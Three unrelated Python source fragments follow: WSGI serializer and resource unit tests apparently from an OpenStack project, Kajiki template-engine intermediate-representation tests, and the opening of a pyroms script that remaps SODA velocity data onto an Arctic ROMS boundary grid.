self.assertEqual(resources[0], getattr(r, get_db_one_func)('id0'))
self.assertEqual(resources[1], getattr(r, get_db_one_func)('id1'))
self.assertEqual(resources[2], getattr(r, get_db_one_func)('id2'))
self.assertIsNone(getattr(r, get_db_one_func)('id3'))
self.assertEqual({'id0': resources[0],
'id1': resources[1],
'id2': resources[2]}, getattr(r, get_db_all_func)())
class ActionDispatcherTest(test.TestCase):
def test_dispatch(self):
serializer = wsgi.ActionDispatcher()
serializer.create = lambda x: 'pants'
self.assertEqual('pants', serializer.dispatch({}, action='create'))
def test_dispatch_action_None(self):
serializer = wsgi.ActionDispatcher()
serializer.create = lambda x: 'pants'
serializer.default = lambda x: 'trousers'
self.assertEqual('trousers', serializer.dispatch({}, action=None))
def test_dispatch_default(self):
serializer = wsgi.ActionDispatcher()
serializer.create = lambda x: 'pants'
serializer.default = lambda x: 'trousers'
self.assertEqual('trousers', serializer.dispatch({}, action='update'))
class DictSerializerTest(test.TestCase):
def test_dispatch_default(self):
serializer = wsgi.DictSerializer()
self.assertEqual('', serializer.serialize({}, 'update'))
class XMLDictSerializerTest(test.TestCase):
def test_xml(self):
input_dict = dict(servers=dict(a=(2, 3)))
expected_xml = '<serversxmlns="asdf"><a>(2,3)</a></servers>'
serializer = wsgi.XMLDictSerializer(xmlns="asdf")
result = serializer.serialize(input_dict)
result = result.replace('\n', '').replace(' ', '')
self.assertEqual(expected_xml, result)
class JSONDictSerializerTest(test.TestCase):
def test_json(self):
input_dict = dict(servers=dict(a=(2, 3)))
expected_json = '{"servers":{"a":[2,3]}}'
serializer = wsgi.JSONDictSerializer()
result = serializer.serialize(input_dict)
result = result.replace('\n', '').replace(' ', '')
self.assertEqual(expected_json, result)
class TextDeserializerTest(test.TestCase):
def test_dispatch_default(self):
deserializer = wsgi.TextDeserializer()
self.assertEqual({}, deserializer.deserialize({}, 'update'))
class JSONDeserializerTest(test.TestCase):
def test_json(self):
data = """{"a": {
"a1": "1",
"a2": "2",
"bs": ["1", "2", "3", {"c": {"c1": "1"}}],
"d": {"e": "1"},
"f": "1"}}"""
as_dict = {
'body': {
'a': {
'a1': '1',
'a2': '2',
'bs': ['1', '2', '3', {'c': {'c1': '1'}}],
'd': {'e': '1'},
'f': '1',
},
},
}
deserializer = wsgi.JSONDeserializer()
self.assertEqual(as_dict, deserializer.deserialize(data))
class XMLDeserializerTest(test.TestCase):
def test_xml(self):
xml = """
<a a1="1" a2="2">
<bs><b>1</b><b>2</b><b>3</b><b><c c1="1"/></b></bs>
<d><e>1</e></d>
<f>1</f>
</a>
""".strip()
as_dict = {
'body': {
'a': {
'a1': '1',
'a2': '2',
'bs': ['1', '2', '3', {'c': {'c1': '1'}}],
'd': {'e': '1'},
'f': '1',
},
},
}
metadata = {'plurals': {'bs': 'b', 'ts': 't'}}
deserializer = wsgi.XMLDeserializer(metadata=metadata)
self.assertEqual(as_dict, deserializer.deserialize(xml))
def test_xml_empty(self):
xml = """<a></a>"""
as_dict = {"body": {"a": {}}}
deserializer = wsgi.XMLDeserializer()
self.assertEqual(as_dict, deserializer.deserialize(xml))
class MetadataXMLDeserializerTest(test.TestCase):
def test_xml_meta_parsing_special_character(self):
"""Test XML meta parsing with special characters.
Test that when a SaxParser splits a string containing special
characters into multiple childNodes there are no issues extracting
the text.
"""
meta_xml_str = """
<metadata>
<meta key="key3">value&3</meta>
<meta key="key2">value2</meta>
<meta key="key1">value1</meta>
</metadata>
""".strip()
meta_expected = {'key1': 'value1',
'key2': 'value2',
'key3': 'value&3'}
meta_deserializer = wsgi.MetadataXMLDeserializer()
document = wsgi.utils.safe_minidom_parse_string(meta_xml_str)
root_node = document.childNodes[0]
meta_extracted = meta_deserializer.extract_metadata(root_node)
self.assertEqual(meta_expected, meta_extracted)
class ResourceTest(test.TestCase):
def test_resource_call(self):
class Controller(object):
def index(self, req):
return 'off'
req = webob.Request.blank('/tests')
app = fakes.TestRouter(Controller())
response = req.get_response(app)
self.assertEqual('off', response.body)
self.assertEqual(200, response.status_int)
def test_resource_not_authorized(self):
class Controller(object):
def index(self, req):
raise exception.NotAuthorized()
req = webob.Request.blank('/tests')
app = fakes.TestRouter(Controller())
response = req.get_response(app)
self.assertEqual(403, response.status_int)
def test_dispatch(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
method, _extensions = resource.get_method(None, 'index', None, '')
actual = resource.dispatch(method, None, {'pants': 'off'})
expected = 'off'
self.assertEqual(expected, actual)
def test_get_method_undefined_controller_action(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
self.assertRaises(AttributeError, resource.get_method,
None, 'create', None, '')
def test_get_method_action_json(self):
class Controller(wsgi.Controller):
@wsgi.action('fooAction')
def _action_foo(self, req, id, body):
return body
controller = Controller()
resource = wsgi.Resource(controller)
method, _extensions = resource.get_method(None, 'action',
'application/json',
'{"fooAction": true}')
self.assertEqual(controller._action_foo, method)
def test_get_method_action_xml(self):
class Controller(wsgi.Controller):
@wsgi.action('fooAction')
def _action_foo(self, req, id, body):
return body
controller = Controller()
resource = wsgi.Resource(controller)
method, _extensions = resource.get_method(
None, 'action', 'application/xml', '<fooAction>true</fooAction>')
self.assertEqual(controller._action_foo, method)
def test_get_method_action_bad_body(self):
class Controller(wsgi.Controller):
@wsgi.action('fooAction')
def _action_foo(self, req, id, body):
return body
controller = Controller()
resource = wsgi.Resource(controller)
self.assertRaises(exception.MalformedRequestBody, resource.get_method,
None, 'action', 'application/json', '{}')
def test_get_method_unknown_controller_action(self):
class Controller(wsgi.Controller):
@wsgi.action('fooAction')
def _action_foo(self, req, id, body):
return body
controller = Controller()
resource = wsgi.Resource(controller)
self.assertRaises(KeyError, resource.get_method,
None, 'action', 'application/json',
'{"barAction": true}')
def test_get_method_action_method(self):
class Controller(object):
def action(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
method, _extensions = resource.get_method(None, 'action',
'application/xml',
'<fooAction>true</fooAction')
self.assertEqual(controller.action, method)
def test_get_action_args(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
env = {
'wsgiorg.routing_args': [None, {
'controller': None,
'format': None,
'action': 'update',
'id': 12,
}],
}
expected = {'action': 'update', 'id': 12}
self.assertEqual(expected, resource.get_action_args(env))
def test_get_body_bad_content(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
request = wsgi.Request.blank('/', method='POST')
request.headers['Content-Type'] = 'application/none'
request.body = 'foo'
content_type, body = resource.get_body(request)
self.assertIsNone(content_type)
self.assertEqual('', body)
def test_get_body_no_content_type(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
request = wsgi.Request.blank('/', method='POST')
request.body = 'foo'
content_type, body = resource.get_body(request)
self.assertIsNone(content_type)
self.assertEqual('', body)
def test_get_body_no_content_body(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
request = wsgi.Request.blank('/', method='POST')
request.headers['Content-Type'] = 'application/json'
request.body = ''
content_type, body = resource.get_body(request)
self.assertIsNone(content_type)
self.assertEqual('', body)
def test_get_body(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
request = wsgi.Request.blank('/', method='POST')
request.headers['Content-Type'] = 'application/json'
request.body = 'foo'
content_type, body = resource.get_body(request)
self.assertEqual('application/json', content_type)
self.assertEqual('foo', body)
def test_deserialize_badtype(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
self.assertRaises(exception.InvalidContentType,
resource.deserialize,
controller.index, 'application/none', 'foo')
def test_deserialize_default(self):
class JSONDeserializer(object):
def deserialize(self, body):
return 'json'
class XMLDeserializer(object):
def deserialize(self, body):
return 'xml'
class Controller(object):
@wsgi.deserializers(xml=XMLDeserializer)
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller, json=JSONDeserializer)
obj = resource.deserialize(controller.index, 'application/json', 'foo')
self.assertEqual('json', obj)
def test_deserialize_decorator(self):
class JSONDeserializer(object):
def deserialize(self, body):
return 'json'
class XMLDeserializer(object):
def deserialize(self, body):
return 'xml'
class Controller(object):
@wsgi.deserializers(xml=XMLDeserializer)
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller, json=JSONDeserializer)
obj = resource.deserialize(controller.index, 'application/xml', 'foo')
self.assertEqual('xml', obj)
def test_register_actions(self):
class Controller(object):
def index(self, req, pants=None):
return pants
class ControllerExtended(wsgi.Controller):
@wsgi.action('fooAction')
def _action_foo(self, req, id, body):
return body
@wsgi.action('barAction')
def _action_bar(self, req, id, body):
return body
controller = Controller()
resource = wsgi.Resource(controller)
self.assertEqual({}, resource.wsgi_actions)
extended = ControllerExtended()
resource.register_actions(extended)
self.assertEqual({'fooAction': extended._action_foo,
'barAction': extended._action_bar, },
resource.wsgi_actions)
def test_register_extensions(self):
class Controller(object):
def index(self, req, pants=None):
return pants
class ControllerExtended(wsgi.Controller):
@wsgi.extends
def index(self, req, resp_obj, pants=None):
return None
@wsgi.extends(action='fooAction')
def _action_foo(self, req, resp, id, body):
return None
controller = Controller()
resource = wsgi.Resource(controller)
self.assertEqual({}, resource.wsgi_extensions)
self.assertEqual({}, resource.wsgi_action_extensions)
extended = ControllerExtended()
resource.register_extensions(extended)
self.assertEqual({'index': [extended.index]}, resource.wsgi_extensions)
self.assertEqual({'fooAction': [extended._action_foo]},
resource.wsgi_action_extensions)
def test_get_method_extensions(self):
class Controller(object):
def index(self, req, pants=None):
return pants
class ControllerExtended(wsgi.Controller):
@wsgi.extends
def index(self, req, resp_obj, pants=None):
return None
controller = Controller()
extended = ControllerExtended()
resource = wsgi.Resource(controller)
resource.register_extensions(extended)
method, extensions = resource.get_method(None, 'index', None, '')
self.assertEqual(controller.index, method)
self.assertEqual([extended.index], extensions)
def test_get_method_action_extensions(self):
class Controller(wsgi.Controller):
def index(self, req, pants=None):
return pants
@wsgi.action('fooAction')
def _action_foo(self, req, id, body):
return body
class ControllerExtended(wsgi.Controller):
@wsgi.extends(action='fooAction')
def _action_foo(self, req, resp_obj, id, body):
return None
controller = Controller()
extended = ControllerExtended()
resource = wsgi.Resource(controller)
resource.register_extensions(extended)
method, extensions = resource.get_method(None, 'action',
'application/json',
'{"fooAction": true}')
self.assertEqual(controller._action_foo, method)
self.assertEqual([extended._action_foo], extensions)
def test_get_method_action_whitelist_extensions(self):
class Controller(wsgi.Controller):
def index(self, req, pants=None):
return pants
class ControllerExtended(wsgi.Controller):
@wsgi.action('create')
def _create(self, req, body):
pass
@wsgi.action('delete')
def _delete(self, req, id):
pass
controller = Controller()
extended = ControllerExtended()
resource = wsgi.Resource(controller)
resource.register_actions(extended)
method, extensions = resource.get_method(None, 'create',
'application/json',
'{"create": true}')
self.assertEqual(extended._create, method)
self.assertEqual([], extensions)
method, extensions = resource.get_method(None, 'delete', None, None)
self.assertEqual(extended._delete, method)
self.assertEqual([], extensions)
def test_pre_process_extensions_regular(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
called = []
def extension1(req, resp_obj):
called.append(1)
return None
def extension2(req, resp_obj):
called.append(2)
return None
extensions = [extension1, extension2]
response, post = resource.pre_process_extensions(extensions, None, {})
self.assertEqual([], called)
self.assertIsNone(response)
self.assertEqual([extension2, extension1], list(post))
def test_pre_process_extensions_generator(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
called = []
def extension1(req):
called.append('pre1')
yield
called.append('post1')
def extension2(req):
called.append('pre2')
yield
called.append('post2')
extensions = [extension1, extension2]
response, post = resource.pre_process_extensions(extensions, None, {})
post = list(post)
self.assertEqual(['pre1', 'pre2'], called)
self.assertIsNone(response)
self.assertEqual(2, len(post))
self.assertTrue(inspect.isgenerator(post[0]))
self.assertTrue(inspect.isgenerator(post[1]))
for gen in post:
try:
gen.send(None)
except StopIteration:
continue
self.assertEqual(['pre1', 'pre2', 'post2', 'post1'], called)
def test_pre_process_extensions_generator_response(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
called = []
def extension1(req):
called.append('pre1')
yield 'foo'
def extension2(req):
called.append('pre2')
extensions = [extension1, extension2]
response, post = resource.pre_process_extensions(extensions, None, {})
self.assertEqual(['pre1'], called)
self.assertEqual('foo', response)
self.assertEqual([], post)
def test_post_process_extensions_regular(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
called = []
def extension1(req, resp_obj):
called.append(1)
return None
def extension2(req, resp_obj):
called.append(2)
return None
response = resource.post_process_extensions([extension2, extension1],
None, None, {})
self.assertEqual([2, 1], called)
self.assertIsNone(response)
def test_post_process_extensions_regular_response(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
called = []
def extension1(req, resp_obj):
called.append(1)
return None
def extension2(req, resp_obj):
called.append(2)
return 'foo'
response = resource.post_process_extensions([extension2, extension1],
None, None, {})
self.assertEqual([2], called)
self.assertEqual('foo', response)
def test_post_process_extensions_version_not_found(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
called = []
def extension1(req, resp_obj):
called.append(1)
return 'bar'
def extension2(req, resp_obj):
raise exception.VersionNotFoundForAPIMethod(version='fake_version')
response = resource.post_process_extensions([extension2, extension1],
None, None, {})
self.assertEqual([1], called)
self.assertEqual('bar', response)
def test_post_process_extensions_generator(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
called = []
def extension1(req):
yield
called.append(1)
def extension2(req):
yield
called.append(2)
ext1 = extension1(None)
next(ext1)
ext2 = extension2(None)
next(ext2)
response = resource.post_process_extensions([ext2, ext1],
None, None, {})
self.assertEqual([2, 1], called)
self.assertIsNone(response)
def test_post_process_extensions_generator_response(self):
class Controller(object):
def index(self, req, pants=None):
return pants
controller = Controller()
resource = wsgi.Resource(controller)
called = []
def extension1(req):
yield
called.append(1)
def extension2(req):
yield
called.append(2)
yield 'foo'
ext1 = extension1(None)
next(ext1)
ext2 = extension2(None)
next(ext2)
response = resource.post_process_extensions([ext2, ext1],
None, None, {})
self.assertEqual([2], called)
self.assertEqual('foo', response)
class ResponseObjectTest(test.TestCase):
def test_default_code(self):
robj = wsgi.ResponseObject({})
self.assertEqual(200, robj.code)
def test_modified_code(self):
robj = wsgi.ResponseObject({})
robj._default_code = 202
self.assertEqual(202, robj.code)
def test_override_default_code(self):
robj = wsgi.ResponseObject({}, code=404)
self.assertEqual(404, robj.code)
def test_override_modified_code(self):
robj = wsgi.ResponseObject({}, code=404)
robj._default_code = 202
self.assertEqual(404, robj.code)
def test_set_header(self):
robj = wsgi.ResponseObject({})
robj['Header'] = 'foo'
self.assertEqual({'header': 'foo'}, robj.headers)
def test_get_header(self):
robj = wsgi.ResponseObject({})
robj['Header'] = 'foo'
self.assertEqual('foo', robj['hEADER'])
def test_del_header(self):
robj = wsgi.ResponseObject({})
robj['Header'] = 'foo'
del robj['hEADER']
self.assertNotIn('header', robj.headers)
def test_header_isolation(self):
robj = wsgi.ResponseObject({})
robj['Header'] = 'foo'
hdrs = robj.headers
hdrs['hEADER'] = 'bar'
self.assertEqual('foo', robj['hEADER'])
def test_default_serializers(self):
robj = wsgi.ResponseObject({})
self.assertEqual({}, robj.serializers)
def test_bind_serializers(self):
robj = wsgi.ResponseObject({}, json='foo')
robj._bind_method_serializers(dict(xml='bar', json='baz'))
self.assertEqual(dict(xml='bar', json='foo'), robj.serializers)
def test_get_serializer(self):
robj = wsgi.ResponseObject({}, json='json', xml='xml', atom='atom')
for content_type, mtype in wsgi._MEDIA_TYPE_MAP.items():
_mtype, serializer = robj.get_serializer(content_type)
self.assertEqual(mtype, serializer)
def test_get_serializer_defaults(self):
robj = wsgi.ResponseObject({})
default_serializers = dict(json='json', xml='xml', atom='atom')
for content_type, mtype in wsgi._MEDIA_TYPE_MAP.items():
self.assertRaises(exception.InvalidContentType,
robj.get_serializer, content_type)
_mtype, serializer = robj.get_serializer(content_type,
default_serializers)
self.assertEqual(mtype, serializer)
def test_serialize(self):
class JSONSerializer(object):
def serialize(self, obj):
return 'json'
class XMLSerializer(object):
def serialize(self, obj):
return 'xml'
class AtomSerializer(object):
def serialize(self, obj):
return 'atom'
robj = wsgi.ResponseObject({}, code=202,
json=JSONSerializer,
xml=XMLSerializer,
atom=AtomSerializer)
robj['X-header1'] = 'header1'
robj['X-header2'] = 'header2'
for content_type, mtype in wsgi._MEDIA_TYPE_MAP.items():
request = wsgi.Request.blank('/tests/123')
response = robj.serialize(request, content_type)
self.assertEqual(content_type, response.headers['Content-Type'])
self.assertEqual('header1', response.headers['X-header1'])
self.assertEqual('header2', response.headers['X-header2'])
self.assertEqual(202, response.status_int)
self.assertEqual(mtype, response.body)
class ValidBodyTest(test.TestCase):
def setUp(self):
super(ValidBodyTest, self).setUp()
self.controller = wsgi.Controller()
def test_is_valid_body(self):
body = {'foo': {}}
self.assertTrue(self.controller.is_valid_body(body, 'foo'))
def test_is_valid_body_none(self):
wsgi.Resource(controller=None)
self.assertFalse(self.controller.is_valid_body(None, 'foo'))
def test_is_valid_body_empty(self):
wsgi.Resource(controller=None)
self.assertFalse(self.controller.is_valid_body({}, 'foo'))
def test_is_valid_body_no_entity(self):
wsgi.Resource(controller=None)
body = {'bar': {}}
self.assertFalse(self.controller.is_valid_body(body, 'foo'))
def test_is_valid_body_malformed_entity(self):
wsgi.Resource(controller=None)
body = {'foo': 'bar'}
self.assertFalse(self.controller.is_valid_body(body, 'foo'))
def test_validate_string_length_with_name_too_long(self):
name = 'a' * 256
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.validate_string_length,
name, 'Name', min_length=1, max_length=255,
remove_whitespaces=False)
def test_validate_string_length_with_name_contains_white_spaces(
self):
body = {'name': 'a' * 255 + " "}
self.controller.validate_string_length(
body['name'], 'name', min_length=1, max_length=255,
remove_whitespaces=True)
def test_validate_name_and_description_with_name_too_long(self):
body = {'name': 'a' * 256}
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.validate_name_and_description,
body)
def test_validate_name_and_description_with_desc_too_long(self):
body = {'description': 'a' * 256}
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.validate_name_and_description,
body)
def test_validate_name_and_description_with_name_as_int(self):
body = {'name': 1234}
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.validate_name_and_description,
body)
def test_validate_name_and_description_with_desc_as_int(self):
body = {'description': 1234}
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.validate_name_and_description,
body)
def test_validate_name_and_description_with_name_zero_length(self):
# NOTE(jdg): We allow zero length names currently, particularly
# from Nova, changes to this require an API version bump
body = {'name': ""}
self.controller.validate_name_and_description(body)
self.assertEqual('', body['name'])
def test_validate_name_and_description_with_desc_zero_length(self):
body = {'description': ""}
self.controller.validate_name_and_description(body)
self.assertEqual('', body['description'])
def test_validate_name_and_description_with_name_contains_white_spaces(
self):
body = {'name': 'a' * 255 + " "}
self.controller.validate_name_and_description(body)
self.assertEqual('a' * 255, body['name'])
def test_validate_integer_greater_than_max_int_limit(self):
value = (2 ** 31) + 1
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.validate_integer,
value, 'limit', min_value=-1, max_value=(2 ** 31))
def test_validate_integer_less_than_min_int_limit(self):
value = -12
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.validate_integer,
value, 'limit', min_value=-1, max_value=(2 ** 31))
def test_validate_integer_invalid_limit(self):
value = "should_be_int"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.validate_integer,
value, 'limit', min_value=-1, max_value=(2 ** 31))
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from unittest import TestCase, main
import kajiki
from kajiki import ir
class TestBasic(TestCase):
def setUp(self):
self.tpl = ir.TemplateNode(
defs=[ir.DefNode(
'__main__()',
ir.TextNode('Hello, '),
ir.ExprNode('name'),
ir.TextNode('\n'))])
def test(self):
tpl = kajiki.template.from_ir(self.tpl)
rsp = tpl(dict(name='Rick')).render()
assert rsp == 'Hello, Rick\n', rsp
class TestSwitch(TestCase):
def setUp(self):
self.tpl = ir.TemplateNode(
defs=[ir.DefNode(
'__main__()',
ir.ForNode(
'i in range(2)',
ir.ExprNode('i'),
ir.TextNode(' is '),
ir.SwitchNode(
'i % 2',
ir.CaseNode(
'0',
ir.TextNode('even\n')),
ir.ElseNode(
ir.TextNode('odd\n')))))])
def test_basic(self):
tpl = kajiki.template.from_ir(self.tpl)
rsp = tpl(dict()).render()
assert rsp == '0 is even\n1 is odd\n', rsp
class TestFunction(TestCase):
def setUp(self):
self.tpl = ir.TemplateNode(
defs=[ir.DefNode(
'evenness(n)',
ir.IfNode(
'n % 2 == 0',
ir.TextNode('even')),
ir.ElseNode(
ir.TextNode('odd'))),
ir.DefNode(
'__main__()',
ir.ForNode(
'i in range(2)',
ir.ExprNode('i'),
ir.TextNode(' is '),
ir.ExprNode('evenness(i)'),
ir.TextNode('\n')))])
def test_basic(self):
tpl = kajiki.template.from_ir(self.tpl)
rsp = tpl(dict(name='Rick')).render()
assert rsp == '0 is even\n1 is odd\n', rsp
class TestCall(TestCase):
def setUp(self):
self.tpl = ir.TemplateNode(
defs=[ir.DefNode(
'quote(caller, speaker)',
ir.ForNode(
'i in range(2)',
ir.TextNode('Quoth '),
ir.ExprNode('speaker'),
ir.TextNode(', "'),
ir.ExprNode('caller(i)'),
ir.TextNode('."\n'))),
ir.DefNode(
'__main__()',
ir.CallNode(
'$caller(n)',
"quote($caller, 'the raven')",
ir.TextNode('Nevermore '),
ir.ExprNode('n')))])
def test_basic(self):
tpl = kajiki.template.from_ir(self.tpl)
rsp = tpl(dict(name='Rick')).render()
assert (
rsp == 'Quoth the raven, "Nevermore 0."\n'
'Quoth the raven, "Nevermore 1."\n'), rsp
class TestImport(TestCase):
def setUp(self):
lib = ir.TemplateNode(
defs=[ir.DefNode(
'evenness(n)',
ir.IfNode(
'n % 2 == 0',
ir.TextNode('even')),
ir.ElseNode(
ir.TextNode('odd'))),
ir.DefNode(
'half_evenness(n)',
ir.TextNode(' half of '),
ir.ExprNode('n'),
ir.TextNode(' is '),
ir.ExprNode('evenness(n/2)'))])
tpl = ir.TemplateNode(
defs=[ir.DefNode(
'__main__()',
ir.ImportNode(
'lib.txt',
'simple_function'),
ir.ForNode(
'i in range(4)',
ir.ExprNode('i'),
ir.TextNode(' is '),
ir.ExprNode('simple_function.evenness(i)'),
ir.ExprNode('simple_function.half_evenness(i)'),
ir.TextNode('\n')))])
loader = kajiki.loader.MockLoader({
'lib.txt': kajiki.template.from_ir(lib),
'tpl.txt': kajiki.template.from_ir(tpl)})
self.tpl = loader.import_('tpl.txt')
def test_import(self):
rsp = self.tpl(dict(name='Rick')).render()
assert (rsp == '0 is even half of 0 is even\n'
'1 is odd half of 1 is odd\n'
'2 is even half of 2 is odd\n'
'3 is odd half of 3 is odd\n'), rsp
class TestInclude(TestCase):
def setUp(self):
hdr = ir.TemplateNode(
defs=[
ir.DefNode(
'__main__()',
ir.TextNode('# header\n'))])
tpl = ir.TemplateNode(
defs=[
ir.DefNode(
'__main__()',
ir.TextNode('a\n'),
ir.IncludeNode('hdr.txt'),
ir.TextNode('b\n'))])
loader = kajiki.loader.MockLoader({
'hdr.txt': kajiki.template.from_ir(hdr),
'tpl.txt': kajiki.template.from_ir(tpl)})
self.tpl = loader.import_('tpl.txt')
def test_include(self):
rsp = self.tpl(dict(name='Rick')).render()
assert rsp == 'a\n# header\nb\n', rsp
class TestExtends(TestCase):
def setUp(self):
parent_tpl = ir.TemplateNode(
defs=[
ir.DefNode(
'__main__()',
ir.ExprNode('header()'),
ir.ExprNode('body()'),
ir.ExprNode('footer()')),
ir.DefNode(
'header()',
ir.TextNode('# Header name='),
ir.ExprNode('name'),
ir.TextNode('\n')),
ir.DefNode(
'body()',
ir.TextNode('## Parent Body\n'),
ir.TextNode('local.id() = '),
ir.ExprNode('local.id()'),
ir.TextNode('\n'),
ir.TextNode('self.id() = '),
ir.ExprNode('self.id()'),
ir.TextNode('\n'),
ir.TextNode('child.id() = '),
ir.ExprNode('child.id()'),
ir.TextNode('\n')),
ir.DefNode(
'footer()',
ir.TextNode('# Footer\n')),
ir.DefNode(
'id()',
ir.TextNode('parent'))])
mid_tpl = ir.TemplateNode(
defs=[
ir.DefNode(
'__main__()',
ir.ExtendNode('parent.txt')),
ir.DefNode(
'id()',
ir.TextNode('mid'))])
child_tpl = ir.TemplateNode(
defs=[
ir.DefNode(
'__main__()',
ir.ExtendNode('mid.txt')),
ir.DefNode(
'body()',
ir.TextNode('## Child Body\n'),
ir.ExprNode('parent.body()')),
ir.DefNode(
'id()',
ir.TextNode('child'))])
loader = kajiki.loader.MockLoader({
'parent.txt': kajiki.template.from_ir(parent_tpl),
'mid.txt': kajiki.template.from_ir(mid_tpl),
'child.txt': kajiki.template.from_ir(child_tpl)})
self.loader = loader
self.tpl = loader.import_('child.txt')
def test_extends(self):
rsp = self.tpl(dict(name='Rick')).render()
assert (rsp == '# Header name=Rick\n'
'## Child Body\n'
'## Parent Body\n'
'local.id() = parent\n'
'self.id() = child\n'
'child.id() = mid\n'
'# Footer\n'), rsp
class TestDynamicExtends(TestCase):
def setUp(self):
p0 = ir.TemplateNode(
defs=[
ir.DefNode(
'__main__()',
ir.TextNode('Parent 0'))])
p1 = ir.TemplateNode(
defs=[
ir.DefNode(
'__main__()',
ir.TextNode('Parent 1'))])
child = ir.TemplateNode(
defs=[
ir.DefNode(
'__main__()',
ir.IfNode(
'p==0',
ir.ExtendNode('parent0.txt')),
ir.ElseNode(
ir.ExtendNode('parent1.txt')))])
loader = kajiki.loader.MockLoader({
'parent0.txt': kajiki.template.from_ir(p0),
'parent1.txt': kajiki.template.from_ir(p1),
'child.txt': kajiki.template.from_ir(child)})
self.loader = loader
self.tpl = loader.import_('child.txt')
def test_extends(self):
rsp = self.tpl(dict(p=0)).render()
assert rsp == 'Parent 0', rsp
rsp = self.tpl(dict(p=1)).render()
assert rsp == 'Parent 1', rsp
if __name__ == '__main__':
main()
|
|
import numpy as np
import os
try:
import netCDF4 as netCDF
except ImportError:
import netCDF3 as netCDF
import matplotlib.pyplot as plt
import time
from datetime import datetime
from matplotlib.dates import date2num, num2date
import pyroms
import pyroms_toolbox
import _remapping
class nctime(object):
pass
def remap_bdry_uv(src_file, src_grd, dst_grd, dmax=0, cdepth=0, kk=0, dst_dir='./'):
# Arctic
ystart=240
# get time
nctime.long_name = 'time'
nctime.units = 'days since 1900-01-01 00:00:00'
# time reference "days since 1900-01-01 00:00:00"
ref = datetime(1900, 1, 1, 0, 0, 0)
ref = date2num(ref)
tag = src_file.rsplit('/')[-1].rsplit('_')[-1].rsplit('-')[0]
year = int(tag[:4])
month = int(tag[4:6])
day = int(tag[6:])
time = datetime(year, month, day, 0, 0, 0)
time = date2num(time)
time = time - ref
time = time + 2.5 # 5-day average
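# Illustrative note (not in the original script): for a source file tagged e.g. 19900115,
# the parsed date is datetime(1990, 1, 15); the stored ocean_time is then the number of
# days between that date and 1900-01-01 plus 2.5, i.e. the mid-point of the 5-day window.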
# get dimensions
Mp, Lp = dst_grd.hgrid.mask_rho.shape
# create destination file
dst_file = src_file.rsplit('/')[-1]
dst_fileu = dst_dir + dst_file[:-4] + '_u_bdry_' + dst_grd.name + '.nc'
print '\nCreating destination file', dst_fileu
if os.path.exists(dst_fileu):
os.remove(dst_fileu)
pyroms_toolbox.nc_create_roms_file(dst_fileu, dst_grd, nctime)
dst_filev = dst_dir + dst_file[:-4] + '_v_bdry_' + dst_grd.name + '.nc'
print 'Creating destination file', dst_filev
if os.path.exists(dst_filev):
os.remove(dst_filev)
pyroms_toolbox.nc_create_roms_file(dst_filev, dst_grd, nctime)
# open destination file
ncu = netCDF.Dataset(dst_fileu, 'a', format='NETCDF3_64BIT')
ncv = netCDF.Dataset(dst_filev, 'a', format='NETCDF3_64BIT')
#load var
cdf = netCDF.Dataset(src_file)
src_varu = cdf.variables['u']
src_varv = cdf.variables['v']
#get missing value
spval = src_varu._FillValue
# ARCTIC2 grid sub-sample
src_varu = src_varu[:]
src_varu = src_varu[:,np.r_[ystart:np.size(src_varu,1),-1],:]
src_varv = src_varv[:]
src_varv = src_varv[:,np.r_[ystart:np.size(src_varv,1),-1],:]
# get weights file
wts_file = 'remap_weights_SODA_2.1.6_to_ARCTIC2_bilinear_uv_to_rho.nc'
# build intermediate zgrid
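# The remapping is done in two stages: first horizontally on the fixed z levels of the
# source grid (remap below), then vertically from z levels to the ROMS s-coordinate
# (z2roms further down). dst_grdz pairs the destination horizontal grid with the source
# z levels for that intermediate step.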
zlevel = -src_grd.z_t[::-1,0,0]
nzlevel = len(zlevel)
dst_zcoord = pyroms.vgrid.z_coordinate(dst_grd.vgrid.h, zlevel, nzlevel)
dst_grdz = pyroms.grid.ROMS_Grid(dst_grd.name+'_Z', dst_grd.hgrid, dst_zcoord)
# create variable in destination file
print 'Creating variable u_north'
ncu.createVariable('u_north', 'f8', ('ocean_time', 's_rho', 'xi_u'), fill_value=spval)
ncu.variables['u_north'].long_name = '3D u-momentum north boundary condition'
ncu.variables['u_north'].units = 'meter second-1'
ncu.variables['u_north'].field = 'u_north, scalar, series'
#ncu.variables['u_north']._FillValue = spval
print 'Creating variable u_south'
